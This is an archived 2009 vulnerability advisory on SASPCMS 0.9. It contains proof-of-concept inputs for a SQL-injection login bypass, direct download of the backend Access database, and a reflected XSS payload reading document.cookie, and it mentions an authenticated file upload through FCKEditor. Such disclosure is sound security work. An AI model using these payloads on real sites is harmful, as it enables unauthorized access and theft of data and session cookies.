SASPCMS Multiple Vulnerabilities

2009-04-10T00:00:00
ID SECURITYVULNS:DOC:21608
Type securityvulns
Reporter Securityvulns
Modified 2009-04-10T00:00:00

Description

####################www.BugReport.ir

AmnPardaz Security Research Team

Title: SASPCMS Multiple Vulnerabilities

Vendor: http://www.lgasoft.com

Vulnerable Version: 0.9 (prior versions also may be affected)

Exploitation: Remote with browser

Fix: N/A

  • Description:

SASPCMS is an ASP Content Management System . SASPCMS witch uses MSSQL
& Microsoft Access as backend database.

  • Vulnerability:

+-->Authentication Bypass

POC: ' or ''=' http://[URL]/saspcms/admin/default.asp

+-->Database Information Disclosure

POC: http://[URL]/saspcms/db/menu.mdb

+-->Cross Site Scripting (XSS). Reflected XSS attack in "default.asp"
in "q" parameter.

POC:
http://[URL]/saspcms/default.asp?q=<script>alert(document.cookie)</script>

  • PoC:

It's possible for remote attackers to upload arbitrary files by using
FCKEditor after login to admin area.

http://www.bugreport.ir/64/exploit.htm

  • Solution:

Edit the source code to ensure that inputs are properly sanitized.

  • Credit:

AmnPardaz Security Research & Penetration Testing Group Contact: admin[4t}bugreport{d0t]ir www.BugReport.ir www.AmnPardaz.com